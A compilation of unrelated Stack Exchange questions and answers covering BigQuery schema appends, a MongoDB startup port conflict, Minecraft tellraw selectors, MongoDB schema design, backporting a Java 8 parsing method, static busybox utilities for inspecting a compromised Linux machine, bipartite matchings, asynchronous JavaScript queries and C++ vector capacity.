Appending to Destination Table with Some Nullable Fields missing Fails in BigQuery I've running a query where the query result needs to be appended (WRITE_APPEND) to a destination table. In the destination table there are several fields that are NULLABLE. In my query result, some of the NULLABLE fields from destination table are missing. My query fails with following error: Query Failed Error: Invalid schema update. Field age is missing in new schema Job ID: job_5761xOBwaQbQPIi6wD9dqy-Cdzk Seems like a unnecessary limitation especially given that I can do the same thing via JSON uploads. Is there any work around to this? Thanks, Navneet We've got a fix for this issue, it got re-prioritized behind some other work, but we'll likely get it in soon, hopefully by early next week. awesome.. that will be great! Hi Jordan, I'm trying the fix the Fh. suggested. Select null as a_field, etc. (see job: job_57jKlRYSmsQ2j9AwKX36akiRImE ). However it gives me the following error. Query Failed Error: Invalid schema update. Field age has changed type . Can you please suggest what's the right way to save to destination table when the query result are missing some fields that are nullable in the destination table. Thanks a lot. - navneet That's an interesting feature request. In the meantime, could you manually add the missing columns as nulls to the query, so it doesn't fail? Something like this: SELECT word, null AS a_field FROM [publicdata:samples.shakespeare] LIMIT 10 (note that column a_field has only nulls) Yes. I know this will work. Would appreciate the feature in future. Jordan saves the day :) Not so quick.. Now I get a different error: Query Failed Error: Invalid schema update. Field age has changed type Job ID: job_57jKlRYSmsQ2j9AwKX36akiRImE haven't been able to reproduce - more context? (or reply to Jordan's answer to get him notified) sure.. are you able to see the job? job_57jKlRYSmsQ2j9AwKX36akiRImE Here's the query: SELECT user as name, null as age FROM [ziptrips.tempTable2]; The destination table has two columns: name:string, age:integer. I get the following error: Query Failed Error: Invalid schema update. Field age has changed type Job ID: job_OepNVE3587egdJOSp2DYAJB8n0I Please add more context. I can help answer much faster this way. Job ids are better for bugs that get reported to the team, but for general queries support, prefer pasting the actual query and preferably sample data - that way a lot more people can answer these questions. The null default data type is not the same as the data type of the field in your schema. You need to define its data type. try SELECT user as name, integer(null) as age FROM [ziptrips.tempTable2];
common-pile/stackexchange_filtered
Mongod server not woking due to the following error sanket@sanket:~$ sudo mongod sudo: unable to resolve host sanket [sudo] password for sanket: mongod --help for help and startup options Sun Oct 5 09:58:48.970 [initandlisten] MongoDB starting : pid=2548 port=27017 dbpath=/data/db/ 64-bit host=sanket Sun Oct 5 09:58:48.970 [initandlisten] db version v2.4.9 Sun Oct 5 09:58:48.970 [initandlisten] git version: nogitversion Sun Oct 5 09:58:48.970 [initandlisten] build info: Linux orlo 3.2.0-58-generic #88-Ubuntu SMP Tue Dec 3 17:37:58 UTC 2013 x86_64 BOOST_LIB_VERSION=1_54 Sun Oct 5 09:58:48.970 [initandlisten] allocator: tcmalloc Sun Oct 5 09:58:48.970 [initandlisten] options: {} Sun Oct 5 09:58:49.101 [initandlisten] journal dir=/data/db/journal Sun Oct 5 09:58:49.102 [initandlisten] recover : no journal files present, no recovery needed Sun Oct 5 09:58:49.237 [initandlisten] ERROR: listen(): bind() failed errno:98 Address already in use for socket: <IP_ADDRESS>:27017 Sun Oct 5 09:58:49.237 [websvr] ERROR: listen(): bind() failed errno:98 Address already in use for socket: <IP_ADDRESS>:28017 Sun Oct 5 09:58:49.237 [initandlisten] ERROR: addr already in use Sun Oct 5 09:58:49.237 [websvr] ERROR: addr already in use Sun Oct 5 09:58:49.237 [initandlisten] now exiting Sun Oct 5 09:58:49.237 dbexit: Sun Oct 5 09:58:49.237 [initandlisten] shutdown: going to close listening sockets... Sun Oct 5 09:58:49.237 [initandlisten] shutdown: going to flush diaglog... Sun Oct 5 09:58:49.237 [initandlisten] shutdown: going to close sockets... Sun Oct 5 09:58:49.237 [initandlisten] shutdown: waiting for fs preallocator... Sun Oct 5 09:58:49.237 [initandlisten] shutdown: lock for final commit... Sun Oct 5 09:58:49.237 [initandlisten] shutdown: final commit... Sun Oct 5 09:58:49.328 [initandlisten] shutdown: closing all files... Sun Oct 5 09:58:49.328 [initandlisten] closeAllFiles() finished Sun Oct 5 09:58:49.328 [initandlisten] journalCleanup... Sun Oct 5 09:58:49.328 [initandlisten] removeJournalFiles Sun Oct 5 09:58:49.390 [initandlisten] shutdown: removing fs lock... Sun Oct 5 09:58:49.390 dbexit: really exiting now sanket@sanket:~$ Hmm... so, /data/db is owned by useer mongodb - seems right. But inside it, /data/db/journal is owned by root. Feels wrong to me. how to change it??it's not allowing to change me the permissions from terminal or without command Yeah... the sudo: unable to resolve host sanket-PC error message is pretty spooky. That seems to be a separate problem. (but both could have the same cause) I added a little to the answer. Something about the sudo: unable to resolve host issue - Related: http://askubuntu.com/questions/59458/error-message-when-i-run-sudo-unable-to-resolve-host-none Looks like you need to fix that sudo thing first - read the link above, it has a good answer. You replaced the whole question - it's not easy to see what changed. Did you get the sudo issue fixed? The new text looks unclear to me. I could edit in the old text again, if you tell what was the step before posting the new version. It's important to have the whole question together even if it's no longer useful for you, because we intend to collect helpfil questions, and good answers. Try this : ps wuax | grep mongo You should see something that looks like this Savio 10592 0.5 0.4 2719784 35624 ?? S 7:34pm 0:09.98 mongod Savio 10911 0.0 0.0 2423368 184 s000 R+ 8:24pm 0:00.00 grep mongo or find word mongod. and then sudo kill 10592 after that start mongod again. for me its work, for error addr alredy use. Works for me. One positive point added The server seems to be started as the wrong user, and can not access it's data files. How did you start it? Did you run it from the shell as your own user, or as a service? Take a look at the owner of the data directories - that's the user it needs to run as. The command ls -ld /data /data/db /data/db/journal would show the user (using three directories because I do not know which will be readable.) Hmm... so, /data/db is owned by useer mongodb - seems right. But inside it, /data/db/journal is owned by root. Feels wrong to me. Try a sudo chown -R mongodb:mongodb /data/db/journal, then /data/db/journal with all files in it is owned by the mongodb user. But there is a independent problem involved, that you need to fix before: sudo does not work and shows the error sudo: unable to resolve host sanket-PC, which means you have currently no root access. See Error message when I run sudo: unable to resolve host (none). You made an edit replacing the whole question text - without saying what changed, so the question makes sense. Looking at the log, there is an interesting error: The database tries to start, and finds that the network port it hast to use to lissten for client connections is already in use: Sun Oct 5 09:58:49.237 [initandlisten] ERROR: listen(): bind() failed errno:98 Address already in use for socket: <IP_ADDRESS>:27017 Sun Oct 5 09:58:49.237 [websvr] ERROR: listen(): bind() failed errno:98 Address already in use for socket: <IP_ADDRESS>:28017 Sun Oct 5 09:58:49.237 [initandlisten] ERROR: addr already in use Sun Oct 5 09:58:49.237 [websvr] ERROR: addr already in use The port is choosen such that there normally is nobody using it for anything else; That means it's most probably mongod that is using the port - meaning there is an instance already running. Try pgrep -fa mongod to show running mongod processes. (Independant of this, it's unclear whether the original issue is fixed. It could not cause the original error here because there were no journal files.) i ran it from terminal. sanket@sanket-PC:~$ ls -ld /data drwxr-xr-x 3 root root 4096 Sep 28 23:04 /data sanket@sanket-PC:~$ ls -ld /data/db drwxrwxrwx 3 mongodb mongodb 4096 Sep 30 22:34 /data/db sanket@sanket-PC:~$ ls -ld /data/db/journal drwxr-xr-x 2 root root 4096 Sep 30 22:45 /data/db/journal sanket@sanket-PC:~$ sudo chmod 777 /data/db/journal sudo: unable to resolve host sanket-PC [sudo] password for sanket: sanket@sanket-PC:~$ sudo chmod 777 /data sudo: unable to resolve host sanket-PC sanket@sanket-PC:~$ sudo chmod 777 /dat You can edit your question and apend it; Comments may get lost (and hard to read, in this case) owner is root for most of the directories.How to change it .I am the administrator.the sudo mongod is also not working
common-pile/stackexchange_filtered
How do I make the player name show up on a /tellraw command? So I am currently making a minecraft custom map (for 1.9). I want to make the player "say" something using /tellraw commands. I did figure out how to make the player name come up using /say commands, but still have no idea how to do it using the /tellraw command. How do I do that? Have you made any attempt to solve this yourself? Arqade works better when askers show effort to solve their own problems; we see that you have a problem you've worked on, and answerers respond to that. You also get a more specific answer that's tailored exactly to the part you're stuck, and Arqade gets a very specific question. Everybody wins! I can try that... Does this answer your question? Is there a way to display a player name in /tellraw command? You'll need to use selectors. These are things like @a, @p, etc. (Look at the link for adding things like scoreboard). To use this in /tellraw, use the following: "extra":[{"selector":"@p"}] So, let's say we want a command to say "Hi! My name is ..." Try this: /tellraw @a {"text":"Hi! My name is ","extra":[{"selector":"@p"}]} To break it down, /tellraw @a @a means all, so this goes to everyone in the world {"text":"Hi! My name is ", The "text" part tells tellraw that the next part (denoted by :) in quotes is text to be displayed. "extra":[{"selector":"@p"}]} The "extra" tag says the next part is something extra (figures). Then, the "selector" tag says the next part is a selector, and "@p" means the nearest player from where the command is being run. Probably More than You Need to Known, Just Putting it Here Anyways To tell everyone in the world, use @a. To tell everyone with a score of 3 in the objective Kills, use @a[score_Kills=3,score_Kills_min=3] In English, it means "Anybody (@a) with a maximum score of 3 and a minimum score of 3". This may sound weird, but since the only number with a maximum of 3 and a minimum of 3 is, well, 3, that command only targets players with 3 as their Kills score.
common-pile/stackexchange_filtered
MongoDB Alternative Design Since it's really not possible to return a single embedded document (yet), what is a good database design alternative? Here is a situation. I have an object First. First has an array of Second objects. Second has an array of Third objects. db.myDb.findOne() { "_id" : ObjectId("..."), "Seconds" : [ { "Second Name" : "value", "Thirds" : [ { "Third Name" : "value" } ] } ] } I have a website that shows a list of First objects. You can select a First object and it will bring you to a page that shows First details which includes the list of Second objects. If you select a Second object, the same sort of thing happens. When pulling up a Third page, it doesn't seem right to have query to get the single First object, then some how drill down in code to get the data for the correct Third object. It would be much easier to just get a single Third object directly, possibly by _id. Maybe I'm still too stuck in SQL land, but in this case my thought would be to create a collection for each of those types and have them reference each other, since I need to get individual objects down the tree, and don't get to keep a reference to an object on each request, like you would be able to in a non-web app. Would this be the correct way to solve this issue, or am I just not thinking clearly in document land? I think this would depend on the usage. If you are frequently needing to access the 'Second' or 'Third' items without the containing 'First', then perhaps they are better not being embedded. A question I have used to help me determine whether something might be better embedded or not is to ask myself whether it is part of it or related to it. E.g, does a 'First' actually contain one or more 'Seconds' (and so on), or are they separate things which happen to be related in some way? On the face of it, I'd say a blog post contains comments (unless you have a compelling need to query the list of comments without knowledge of the posts), but a user/author probably does not contain a list of posts, rather they'd be linked in some way but reside in different collections. Cross-collection relationships can be achieved with MongoDB using DBRef. This is a special type which describes a relationship with another object. If your items do belong in their own collections, they can have a DBRef to point between each other. These could go whichever way round you want (i.e. a collection of them in the First, or each Second could have one pointing to its parent first). Example 1 - each parent has a collection of child references: db.firsts.findOne() { "_id" : ObjectId("..."), "Seconds" : [ { $ref : 'seconds', $id : <idvalue> }, { $ref : 'seconds', $id : <idvalue> }, { $ref : 'seconds', $id : <idvalue> } ] } db.seconds.findOne() { "_id" : ObjectId("..."), "Second Name" : "value", "Thirds" : [ { $ref : 'thirds', $id : <idvalue> }, { $ref : 'thirds', $id : <idvalue> } ] } db.thirds.findOne() { "_id" : ObjectId("..."), "Third Name" : "value" } Example 2 - each child has a reference to its parent db.firsts.findOne() { "_id" : ObjectId("...") } db.seconds.findOne() { "_id" : ObjectId("..."), "First" : { $ref : 'firsts', $id : <idvalue> } "Second Name" : "value", } db.thirds.findOne() { "_id" : ObjectId("..."), "Second" : { $ref : 'seconds', $id : <idvalue> } "Third Name" : "value" } Most of the MongoDB language drivers has a way of dealing with dbrefs in a neater way than on the console (normally using some kind of 'DBRef' class). Working this way will mean you have more database requests, but if it makes sense to your application, it's probably a fair compromise to make - particularly if the list of 'Seconds' or 'Thirds' in your example are commonly needed or key to interaction with the system or its functionality. The second approach is most like you would have using a traditional relational DB. The beauty of MongoDB is that it allows you to work relationally when it actually makes sense to do so, and not when it does not. Very flexible, and ultimately it depends on your data and application as to what makes sense for you. Ultimately the answer to your question of which method you should use depends on your application and the data it stores - not something we can tell from your example.
common-pile/stackexchange_filtered
Categorification of covering morphisms Given a category $\mathsf{A}$, let $\mathsf{Fam}(\mathsf{A})$ be its free coproduct cocompletion (which is always extensive). This means every object has a unique up to iso presentation as a coproduct of connected objects. This category is really part of the data of a fibration $\Pi_0:\mathsf{Fam}(\mathsf{A})\longrightarrow \mathsf{Set}$ assigning to each object its set of connected components. There's also an adjunction $\Pi_0\dashv H$ where $H$ is the "discrete" functor taking a set $A$ to $A\cdot \mathbf{1}=\coprod_A\mathbf{1}$. In the book Galois Theories by Borceux and Janelidze, a neat process of abstraction leads to the following definition. Definition 6.5.9. An arrow $\alpha:A\longrightarrow B$ in $\mathsf{C}=\mathsf{Fam}(\mathsf A)$ is said to be a covering morphism if there exists an effective descent morphism $p:E\longrightarrow B$ such that the square below is a pullback. $$\require{AMScd} \begin{CD} E\times_BA @>{\eta_{E\times_BA}}>> H\Pi_0(E\times_BA)\\ @V{p^\ast\alpha}VV @VV{H\Pi_0(p^\ast\alpha)}V\\ E @>>{\eta_E}> H\Pi_0(E) \end{CD}$$ Concretely, the unit $\eta$ takes a point to its connected component. Since I'm having a hard time visualizing this definition as it's presented, I thought of abstracting the definition of a fiber bundle, and the trying to abstract the definition of a covering space as a fiber bundle with discrete fibers. Definition 1. A trivial fiber bundle with fiber $F$ is an arrow which is isomorphic to $\pi_1:B\times F\longrightarrow B$ in $\mathsf{C}/B$. Definition 2. Let $\mathcal M$ be a class of arrows in a site $\mathsf{C}$. An arrow $\pi:E\longrightarrow B$ is said to be locally in $\mathcal M$ if there's a covering $\left\{u_i:U_i\rightarrow B \right\}$ such that $u_i^\ast\pi$ are all in $\mathcal M$. Definition 3. A fiber bundle with fiber $F$ a locally trivial fiber bundle with fiber $F$, i.e it is locally in the class of projections $X\times F\longrightarrow X$. If $\mathsf{C}$ is complete, trivial fiber bundles are stable under base change (with invariant fiber). If $\mathsf{C}$ is a complete superextensive site, fiber bundles are stable under base change, also with invariant fiber. So complete superextensive sites look like especially good settings for working with fiber bundles. Definition 4. A covering morphism is a fiber bundle such that $F$ is in the essential image of $H$. Why is this definition poor, and why does it not capture what we want a covering morphism to capture? How does it compare to definition 6.5.9 (e.g if we take the extensive topology on $\mathsf{C}$)? What do we want a covering morphism to capture? For $p = \coprod U_i \rightarrow B$ the two conditions are the same. @DimitriChikhladze I'm not even close to seeing this. Could you post an elaboration? Can't think of all the details now, but the fact that the square is a pullback means that on any connected component $U$ of $E$ the morphism $p^\ast\alpha$ is of the form $F\times U$ where $F$ is in the image of $H$. So if $E$ is taken to be $\coprod U_i$ with the $U_i$ connected you get the same condition. But $F$ may vary with the $i$. I don't think superextensivity is necessary for fiber bundles to be stable under base change: just being a site means that coverings pull back. "Categorification" seems like the wrong term here. This sits at the same category level as ordinary covering maps (that is, taking place in a 1-category). I too was thinking you meant categorification in the sense of moving up a categorical level; this was the topic of my PhD thesis... First, definition 3 must be mended to allow varying fibers, so a fiber bundle is locally some product projection. Then, definition 4 also allows for varying discrete fibers. Whenever both definitions (this and 6.5.9) are applicable, they coincide. We'll work our way into increasing generality starting with spaces. $\mathsf{Top}$ with its usual topology is a superextensive site. This allows to replace every covering family with a single arrow - its associated cover (see below). Being an extensive category, $\mathsf{Top}$ has universal coproducts, which ensures the the squares on the left below are pullbacks iff the right one is. $$\require{AMScd} \begin{CD} U_i\times F_i @>>> A\\ @VVV @VV{\alpha}V\\ U_i @>>> B \end{CD}\forall i\iff\require{AMScd} \begin{CD} \coprod_iU_i\times F_i @>>> A\\ @V{p^\ast\alpha}VV @VV{\alpha}V\\ \coprod_iU_i @>>{p}> B \end{CD}$$ This allows us to encapsulate the local triviality definition for fiber bundles in terms of a single base change. Next, for spaces, note the associated cover $p$ is an étale surjection. Étale surjections are effective descent morphsims of spaces, which suggests generalizing to such morphisms in general contexts. The problem is that we can't even write a pullback square with varying fibers if we replace $\coprod_iU_i$ by $E$. However, if we assume $\mathsf{C}$ is actually a free coproduct cocompletion, we may write $E\cong \coprod_iE_i$ where $E_i$ are the connected components of $E$. This yields a notion of a "generalized fiber bundle" - an arrow $\alpha$ for which there exists an effective descent morphism making the square below a pullback. $$\begin{CD} \coprod_iE_i\times F_i @>>> A\\ @VVV @VV{\alpha}V\\ \coprod_iE_i @>>{p}> B \end{CD}$$ Following the setting of spaces, say an arrow is a trivial covering morphism if it's a trivial fiber bundle with discrete fiber (in the essential image of the copower functor $H:A\mapsto \coprod_A\mathbf 1=A\cdot \bf 1$. Since $\mathsf{C}$ is extensive and has products, it is distributive, hence $E_i\times F_i\cong |F_i|\cdot E_i$. This shows the connected component decomposition of the total space of a trivial covering morphism simply has duplicates of the connected compnents of the base space, with multiplicity equal to the cardinality of the fiber (which is always given by $|\Pi_0(F_i)|$). Proposition. Suppose $\mathsf C$ is a free coproduct cocompletion. Then $\alpha$ is a trivial covering morphism if and only if the square below is a pullback. $$\require{AMScd} \begin{CD} A @>{\eta_A}>> H\Pi_0(A)\\ @V{\alpha}VV @VV{H\Pi_0(\alpha)}V\\ B @>>{\eta_B}> H\Pi_0(B) \end{CD}$$ Proof. Let $B\cong\coprod_iB_i$ be the connected components decompositio of $B$. The pullback $B\times_{H\Pi_0(B)}H\Pi_0(A)$ is $\coprod_i | (\Pi_0\alpha)^\ast \left\{ i \right\}|\cdot B_i$ with projection on $B$ given componentwise by identities. The description for $\alpha$ as a trivial fiber bundle with discrete fibers is equivalent, since the components $\alpha:\coprod_i | (\Pi_0\alpha)^\ast \left\{ i \right\}|\cdot B_i\rightarrow \coprod_iB_i$ correspond by connectedness of $B_i$ to the identity. $\square$
common-pile/stackexchange_filtered
A condition ensuring that a bipartite graph have a perfect matching There is a bipartite graph $G=(A,B,E)$ such that for every edge $(a,b)$ (where $a$ comes from $A$ and $b$ from $B$), $\deg(a) \geq \deg(b)$, and additionally $\deg(a) \geq 1$ for all $a \in A$. From this, how can I prove there is matching which covers all of $A$? Have you tried using Hall's criterion? Yes, withous success so far. Hint: Use Hall's criterion. In more detail, suppose that Hall's criterion didn't hold. Choose a set $X$ of minimal size satisfying $|N(X)| < |X|$. Show that $X$ is not empty, and let $Y = X \setminus \{x\}$ for some arbitrary $x \in X$. Show that $Y$ has a perfect matching with $N(Y)$, and prove that $N(N(Y))=Y$ by counting the edges connecting $Y$ and $N(Y)$ in two ways. Show that $\emptyset \neq N(x) \subseteq N(Y)$, and reach a contradiction.
common-pile/stackexchange_filtered
iPhone check format of a file to parse I'm doing an app which can parse XML files generated from different programs. I need to check the first line of the file to detect which program has generated the xml and call the correct method to parse it. i.e one of the file generated starts with this line: <PROFILE XYZ="1"> another program generates the file starting with this line: <AppXYZ DBVersion="<IP_ADDRESS>"> I need to check this line. Any help is appreciated. Thanks, Max It's XML, so just parse it as XML. Check the first element and decide from there. SAX or DOM, either works. What i'm not able to do is to check the first element because it's a root element. The file is like this: blah blahblah blah @masgar: Root elements are just like any other element. Just get the name of the first element, and if the name is "profile" then you're home free, no?
common-pile/stackexchange_filtered
Porting parseUnsignedInt to java1.7 I was using java1.8 which has parseUnsignedInt(). I was told that we have to use java1.7 since that is on the system. I thought I could just port the java.lang.Interger.java, java.lang.Long.java and java.lang.annotation.Native.java functions and compile with my code. This allowed the code to compile without errors. When I run I get the following error: Exception in thread "Thread-6" java.lang.NoSuchMethodError: java.lang.Integer.parseUnsignedInt(Ljava/lang/String;)I The eclipse debugger can't seem to find the function either. What do I have to do to get this working? I doubt you installed it in the proper jar file within the proper package. It is picking your JDK version. It may be an import problem. If you can't get it to work it would be easier to just write your own utility methods to accomplish that requirement. Parsing integers and longs is not that difficult. You're trying to override core java.lang libraries? Yes, I am trying to override the java.lang libraries by compiling version of Integer.java, Long.java and annotation/Native.java in the src directory java/lang of my project. As stated I took the code from 1.8 for these files and basically placed them into my project (as answer 1 suggests) so the compile is correct but at runtime it cannot find them, thus the error above. I just need to figure out how to get the class files in my java\lang to be used instead of whats in the JRE library since 1.7 does not have the parseUnsignedInt() function. you cannot add your own Integer class in the java.lang package because of JDK protection mechanisms. You have to write it in your own class, e.g. as a static method, and change all invokations. Ah, yes I see. I tried renaming it to not cause interference with the Integer package and I got that error. Ok. I'll put it in my base function so as to change the code in the least possible way and ripe it out when we go to java1.8 in a year or so...Thanks. You might be better off with a simple, easy to understand, maintainable solution, like long l = Long.parseLong(string); if(l < 0 || l >= 1L<<32) throw new IllegalArgumentException(); int result = (int) l; instead of copying the JDK code… The method parseUnsignedInt was introduced with Java 1.8, as it is documented in its javadoc (mind the @since 1.8): /** * Parses the string argument as an unsigned decimal integer. The * characters in the string must all be decimal digits, except * that the first character may be an an ASCII plus sign {@code * '+'} ({@code '\u005Cu002B'}). The resulting integer value * is returned, exactly as if the argument and the radix 10 were * given as arguments to the {@link * #parseUnsignedInt(java.lang.String, int)} method. * * @param s a {@code String} containing the unsigned {@code int} * representation to be parsed * @return the unsigned integer value represented by the argument in decimal. * @throws NumberFormatException if the string does not contain a * parsable unsigned integer. * @since 1.8 */ public static int parseUnsignedInt(String s) throws NumberFormatException { return parseUnsignedInt(s, 10); } But the JDK also contains the sources, so you could write your own parseUnsignedInt method in your own class, similar to the implementation contained in Java 8 if the Java 8 license allows that. See http://hg.openjdk.java.net/jdk8/jdk8/jdk/file/687fd7c7986d/src/share/classes/java/lang/Integer.java Line 661 ff For details about security (i.e. why you can't place your own Integer class in java.lang package), option to overrule this security, and a reason why you should not (or better - why you are not allowed to), see selected answer in Why I am able to re-create java.lang package and classes? So, you will have to implement your own class in your own package: package com.yourname; /* * Contains code from OpenJDK Java8, Copyright (c) 1994, 2013, Oracle and/or its affiliates. * TODO add more info from Oracle class comment here. */ public class IntCompatUtilities { public static int parseUnsignedInt(String s) throws NumberFormatException { return parseUnsignedInt(s,10); } public static int parseUnsignedInt(String s, int radix) throws NumberFormatException { //TODO content from OpenJDK 8's Integer.parseUnsignedInt(String,int) here. //instead of return parseInt(s, radix); change to return Integer.parseInt(s, radix); //instead of throw NumberFormatException.forInputString(s); throw new NumberFormatException(...) } } And then, let all your callers call com.yourname.IntCompatUtilities.parseUnsignedInt(...) Thank you for the reference. This is what I have done and it didn't work completely. It allowed to compile but was not runnable. Re-phrased my answer (added detailled instruction what to do).
common-pile/stackexchange_filtered
How to run Ubuntu utils from USB? How can I extract OS utils/commands like "ps,who,lsof,netstat..." and run it from my USB? I need to extract these tools from clean OS linux and run it on infected computer. I tried just copy these tools from /bin but it is not working. You need static linked binaries without external libraries (/lib/*.so files) A major tool for many commands on embedded devices is: busybox You probably find a static version for your os on: busybox.net My busybox... busybox BusyBox v1.30.0 (2018-12-30 22:25:27 CET) multi-call binary. BusyBox is copyrighted by many authors between 1998-2015. Licensed under GPLv2. See source distribution for detailed copyright notices. Usage: busybox [function [arguments]...] or: busybox --list[-full] or: busybox --show SCRIPT or: busybox --install [-s] [DIR] or: function [arguments]... BusyBox is a multi-call binary that combines many common Unix utilities into a single executable. Most people will create a link to busybox for each function they wish to use and BusyBox will act like whatever it was invoked as. Currently defined functions: [, [[, acpid, add-shell, addgroup, adduser, adjtimex, ar, arch, arp, arping, ash, awk, base64, basename, bc, blkdiscard, blkid, blockdev, bootchartd, brctl, bunzip2, bzcat, bzip2, cal, cat, chat, chattr, chgrp, chmod, chown, chpasswd, chpst, chroot, chrt, chvt, cksum, clear, cmp, comm, conspy, cp, cpio, crond, crontab, cryptpw, cttyhack, cut, date, dc, dd, deallocvt, delgroup, deluser, depmod, devmem, df, dhcprelay, diff, dirname, dmesg, dnsd, dnsdomainname, dos2unix, dpkg, dpkg-deb, du, dumpkmap, dumpleases, echo, ed, egrep, eject, env, envdir, envuidgid, expand, expr, factor, fakeidentd, false, fatattr, fbset, fbsplash, fdflush, fdformat, fdisk, fgconsole, fgrep, find, findfs, flash_eraseall, flash_lock, flash_unlock, flashcp, flock, fold, free, freeramdisk, fsck, fsck.minix, fsfreeze, fstrim, fsync, ftpd, ftpget, ftpput, fuser, getopt, getty, grep, groups, gunzip, gzip, halt, hd, hdparm, head, hexdump, hexedit, hostid, hostname, httpd, hush, hwclock, i2cdetect, i2cdump, i2cget, i2cset, id, ifconfig, ifenslave, ifplugd, inetd, init, inotifyd, insmod, install, ionice, iostat, ip, ipaddr, ipcalc, ipcrm, ipcs, iplink, ipneigh, iproute, iprule, iptunnel, kbd_mode, kill, killall, killall5, klogd, last, less, link, linux32, linux64, linuxrc, ln, loadfont, loadkmap, logger, login, logname, losetup, lpd, lpq, lpr, ls, lsattr, lsmod, lsof, lspci, lsscsi, lsusb, lzcat, lzma, lzop, lzopcat, makedevs, makemime, man, md5sum, mdev, mesg, microcom, mkdir, mkdosfs, mke2fs, mkfifo, mkfs.ext2, mkfs.minix, mkfs.vfat, mknod, mkpasswd, mkswap, mktemp, modinfo, modprobe, more, mount, mountpoint, mpstat, mt, mv, nameif, nbd-client, nc, netstat, nice, nl, nmeter, nohup, nologin, nproc, ntpd, nuke, od, openvt, partprobe, passwd, paste, patch, pgrep, pidof, ping, ping6, pipe_progress, pivot_root, pkill, pmap, popmaildir, poweroff, powertop, printenv, printf, ps, pscan, pstree, pwd, pwdx, raidautorun, rdate, rdev, readlink, readprofile, realpath, reboot, reformime, remove-shell, renice, reset, resize, resume, rev, rm, rmdir, rmmod, route, rpm, rpm2cpio, rtcwake, run-init, run-parts, runlevel, runsv, runsvdir, rx, script, scriptreplay, sed, sendmail, seq, setarch, setconsole, setfattr, setfont, setkeycodes, setlogcons, setpriv, setserial, setsid, setuidgid, sh, sha1sum, sha256sum, sha3sum, sha512sum, showkey, shred, shuf, slattach, sleep, smemcap, softlimit, sort, split, ssl_client, start-stop-daemon, stat, strings, stty, su, sulogin, sum, sv, svc, svlogd, svok, swapoff, swapon, switch_root, sync, sysctl, syslogd, tac, tail, tar, taskset, tc, tcpsvd, tee, telnet, telnetd, test, tftp, tftpd, time, timeout, top, touch, tr, traceroute, traceroute6, true, truncate, tty, ttysize, tunctl, tune2fs, ubiattach, ubidetach, ubimkvol, ubirename, ubirmvol, ubirsvol, ubiupdatevol, udhcpc, udhcpd, udpsvd, uevent, umount, uname, uncompress, unexpand, uniq, unix2dos, unlink, unlzma, unlzop, unxz, unzip, uptime, users, usleep, uudecode, uuencode, vconfig, vi, vlock, volname, w, wall, watch, watchdog, wc, wget, which, who, whoami, whois, xargs, xxd, xz, xzcat, yes, zcat, zcip
common-pile/stackexchange_filtered
Issues retrieving a value to use for comparaison in an if statement I have the following variable: var userFound = false; In the event this turns true, I would like the below if statement to be executed: if (userFound) { // res.render('pickup/errorAlreadyDelivered', {}); } However, the issue is that it does not take into account the value change of the variable inside of a for loop above. Below is larger portion of the code. var userFound = false; let sql = `SELECT box_id, cubby_id, comport, deliveredToUser FROM recipients WHERE package_password = ?`; connection.query(sql, [req.session.sessionUserPackagePassword], function(err, rows, fields) { if (!err) { for (var i = 0; i < rows.length; i++) { // Make the comparaison case insensitive if ((rows[i].deliveredToUser).toLowerCase() == `no`) { userFound = true; var comport = rows[i].comport; var command = "open" + rows[i].cubby_id; var commandClose = "close" + rows[i].cubby_id; var commandStatus = "status" + rows[i].cubby_id; console.log(command); console.log(comport); var options = { scriptPath: 'python/scripts', args: [command, comport, commandClose, commandStatus] // pass arguments to the script here }; PythonShell.run('controlLock.py', options, function(err, results) { if (err) { res.render('errorConnection', {}); } console.log('results: %j', results); }); } } // If the query fails to execute } else { console.log('Error while performing Query.'); res.render('errorConnection', {}); } }); connection.end(); if (userFound) { // res.render('pickup/errorAlreadyDelivered', {}); } Any help would be greatly appreciated. You could simply move res.render() to the line where you set userFound = true. It's actually the oposite if tthere is no instance that matches this if ((rows[i].deliveredToUser).toLowerCase() == no) { thats where i want to render this page res.render('pickup/errorAlreadyDelivered', {}); the issue when i put the else if condition inside the for loop is that it doesnt go through all of the for loop row before running the page I see. You can let the for-loop fully traverse and move the if-test (if (userFound)) directly after the for-loop. Even when (if (userFound)) is moved right after the for loop it doesnt seem to record the update value in userFound which is now true so it assumes it false. Hence, when no condition is satisfied this if statement is not executed It seems like any value set inside of the for loop stays inside of the for loop any advice anyone? The callback where you set userFound to true is run after the if (userFound) line runs, even though they are not written in that order. connection.query is an async function. Try putting the userFound logic inside the callback so that it runs after the query result is received and userFound is set to true. connection.query(sql, [req.session.sessionUserPackagePassword], function(err, rows, fields) { if (!err) { for (var i = 0; i < rows.length; i++) { // Make the comparaison case insensitive if ((rows[i].deliveredToUser).toLowerCase() == `no`) { userFound = true; var comport = rows[i].comport; var command = "open" + rows[i].cubby_id; var commandClose = "close" + rows[i].cubby_id; var commandStatus = "status" + rows[i].cubby_id; console.log(command); console.log(comport); var options = { scriptPath: 'python/scripts', args: [command, comport, commandClose, commandStatus] // pass arguments to the script here }; PythonShell.run('controlLock.py', options, function(err, results) { if (err) { res.render('errorConnection', {}); } console.log('results: %j', results); }); } } // If the query fails to execute } else { console.log('Error while performing Query.'); res.render('errorConnection', {}); } connection.end(); if (userFound) { // res.render('pickup/errorAlreadyDelivered', {}); } });
common-pile/stackexchange_filtered
Enforce increase of vector capacity by implementation defined factor when reserving So I have a class wrapping a vector which has the invariant that vec.capacity() > vec.size() so I can always (temporarily) emplace_back one more element without reallocation. My first idea was to call vec.reserve(vec.size() + 1) for every insertion, but this is inefficient as seen in this stackoverflow thread, and insert is called very often. (So is pop_back, therefore the maximal number of elements is way lower than the amounts of insert calls.) My current implementation simplified looks something like this: #include <vector> template<typename T> class VecWrapper { private: std::vector<T> vec; public: [[nodiscard]] auto insert(T new_element) { vec.emplace_back(std::move(new_element)); if (vec.capacity() == vec.size()) { vec.emplace_back(vec.back()); vec.pop_back(); } } }; Is there a less awkward way to trigger a capacity expansion of the vector according to the implementation defined strategy? Note that T is not necessarily default constructible. "My first idea was to call vec.reserve(vec.size() + 1) for every insertion" Couldn't you just reserve more than one element? Like maybe size * 2 or * 1.5 or something? I'm not sure I understand the point of this question. If you didn't do the check, you would get just as many reallocations as if you do this check, and the reallocations would reallocate the same amount of memory. And the reallocations still take place in insert The only difference is a very slight change in exactly when reallocations occur; size and reserve will simply never be equal. So... why is that important? So, the idea is to reserve the memory before it's needed rather than when it's needed? @NicolBolas Reserving like size*2 is exactly what I want, but instead of using my own magic number, I'd very much prefer the expansion strategy of the respective compiler. I want to establish the invariant to be able (for other reasons) to temporarily insert one more element without invalidating iterators. 